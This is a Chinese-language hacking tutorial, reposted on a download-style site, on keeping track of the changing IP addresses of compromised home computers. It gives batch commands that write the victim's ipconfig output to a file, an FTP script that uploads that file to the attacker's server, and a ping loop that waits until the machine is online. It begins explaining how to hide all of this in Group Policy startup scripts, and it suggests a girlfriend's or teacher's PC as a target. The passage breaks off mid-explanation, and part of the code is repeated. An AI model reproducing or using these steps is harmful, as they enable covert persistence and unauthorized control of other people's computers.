牢牢抓住肉雞ip的方法 -電腦資料

    以前弱口令泛濫于網(wǎng)上的時(shí)候，真是爽啊，

牢牢抓住肉雞ip的方法

。作為菜鳥的我的一大愛(ài)好就是拿著x-scan2.3掃描弱口令，因?yàn)橐恍﹤�(gè)人上網(wǎng)的用戶對(duì)安全一點(diǎn)都不重視，默認(rèn)安裝的弱口令到處都是。

    暫且不說(shuō)經(jīng)典的弱口令入侵了，那個(gè)相信大家都會(huì)。當(dāng)時(shí)我難以解決的一個(gè)問(wèn)題就是這些肉雞只要一重起重新連接的話，ip每次都會(huì)變化的，菜鳥的我不會(huì)用反向的木馬，一見加殼頭就大，偏偏殺毒軟件超級(jí)BT，又不會(huì)編程，那感覺(jué)簡(jiǎn)直就像看著上鉤的魚兒游回大海，那個(gè)郁悶啊~~~后來(lái)終于讓我找到一種用腳本牢牢抓住肉雞 ip的方法，注意這些都是正常的腳本，不會(huì)被殺毒軟件發(fā)現(xiàn)的哦，隱蔽而安全，讓你十分想要的又是動(dòng)態(tài)ip的肉雞難逃五指山(譬如你女朋友或者老師的電腦 ~~)。

    廢話不多說(shuō)了，我們就一起來(lái)看看如何用腳本栓住肉 !首先，我們知道因?yàn)槲覀兊娜怆u很特殊，不是長(zhǎng)時(shí)間在線，我們不過(guò)是因?yàn)橐恍┨貏e的原因而想要長(zhǎng)期控制他，但是因?yàn)榘踩�的原因不想用木馬。我們的問(wèn)題是肉雞上線后如何在想得到他的ip的時(shí)候可以快速得到他的ip，(假設(shè)你已經(jīng)開啟了肉雞的telnet或者其他的后門，只要知道ip就可以登陸)。這里，我用的方法是ftp，我也曾經(jīng)想過(guò)用http的方法，但是實(shí)現(xiàn)的難度大點(diǎn)就不考慮了。這里，首先看這幾個(gè)命令:

    ipconfig >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    time /t >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    date /t >C:\WINNT\system32\config\config.txt

    相信大家一看就明白，這樣就可以把我們想要的信息ip和上線日期寫入文件了，你也可以改進(jìn)下，變的美觀并且直接些，譬如echo寫上肉雞的名字，這樣就好分辨了，留給有創(chuàng)意的朋友去發(fā)揮了!。

    這樣將信息寫如文件后的一個(gè)問(wèn)題是如何將這信息寫到某個(gè)我們可以讀取的地方。曾想過(guò)用nc通過(guò)http提交，但是由于文件的大小及http協(xié)議的原因沒(méi)有實(shí)驗(yàn)，有朋友有興趣的話可以試試。這里我用的一個(gè)是ftp的-s參數(shù):

    ftp -n -s:"c:\WINNT\system32\system.ftp"

    -s:后是ftp命令的腳本，其中system.ftp的內(nèi)容如下:

    open 127.0.0.1 8888

    user jnc

    123

    prompt

    mput c:\WINNT\system\config\config.txt

    bye

    首先打開一個(gè)公網(wǎng)ip的ftp(可以是你的某個(gè)肉雞，甚至是更新的域名。)，這里是我自己的ftp，端口為8888，然后輸入用戶名密碼，各做一行，接著是上傳我們寫好的配置文件到一個(gè)目錄下，如果是你的網(wǎng)頁(yè)目錄的話，當(dāng)我們的配置文件上傳后就可以通過(guò)http://jnc.xxx.com/ipconfig.txt直接讀取了。

    哈哈，文件上傳的問(wèn)題解決了，在肉雞方面什么時(shí)候執(zhí)行這樣的寫文件并且執(zhí)行上傳文件的操作呢?要知道個(gè)人用戶這類肉雞不是像服務(wù)器樣時(shí)刻都在線的，他們?cè)诰�的時(shí)間不一定，我們?nèi)绾尾趴梢栽谒麄兩暇�了的時(shí)候才執(zhí)行上面的操作呢?這里我用的是批處理的循環(huán)操作，命令如下:

    ping www.163.com|find "Reply from"

    if %ERRORLEVEL%==0 goto ok

    if %ERRORLEVEL%==1 goto end

    :ok

    ipconfig >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    time /t >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    date /t >C:\WINNT\system32\config\config.txt

    ftp -n -s:"c:\WINNT\system32\system.ftp"

    exit

    :end

    ping www.163.com|find "Reply from"

    if %ERRORLEVEL%==0 goto ok

    if %ERRORLEVEL%==1 goto end

    ping www.163.com|find "Reply from"&&goto ok

    goto end

    ipconfig >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    time /t >>C:\WINNT\system32\config\config.txt

    echo.>>C:\WINNT\system32\config\config.txt

    date /t >C:\WINNT\system32\config\config.txt

    ftp -n -s:"c:\WINNT\system32\system.ftp"

    exit

    :end

    ping www.163.com|find "Reply from"&&goto ok

    goto end

    嘿嘿，首先ping網(wǎng)易的域名在結(jié)果中如果得到有數(shù)據(jù)包返回的信息即返回 %ERRORLEVEL%==0 說(shuō)明用戶上線，夠毒吧!這時(shí)馬上將肉雞信息寫入文件并且上傳，如果ping不通就執(zhí)行循環(huán)直到網(wǎng)絡(luò)接通，

電腦資料

《牢牢抓住肉雞ip的方法》(http://m.clearvueentertainment.com)。

    這樣的話，所要執(zhí)行的文件就寫出來(lái)了，現(xiàn)在的問(wèn)題是如何將執(zhí)行文件的整個(gè)過(guò)程變的隱蔽，開始我想的是將這個(gè)批處理文件寫到啟動(dòng)欄里，但是啟動(dòng)的時(shí)候黑黑的界面太危險(xiǎn)，而且有循環(huán)的，人家不懷疑才怪呢!更糟的是不小心還會(huì)遺失自己的ftp密碼。經(jīng)過(guò)一段時(shí)間的搜索發(fā)現(xiàn)將腳本寫入到組策略的啟動(dòng)腳本里就沒(méi)有任何提示了!而且啟動(dòng)腳本比較隱蔽，一般個(gè)人用戶都不會(huì)注意到這個(gè)地方，并且也很容易實(shí)現(xiàn)。我們分析啟動(dòng)腳本的配置文件C:\WINNT\system32 \GroupPolicy\Machine\Scripts\scripts.ini，注意這個(gè)文件當(dāng)配置啟動(dòng)腳本時(shí)才會(huì)出現(xiàn)，并且有系統(tǒng)隱藏屬性。文件如下：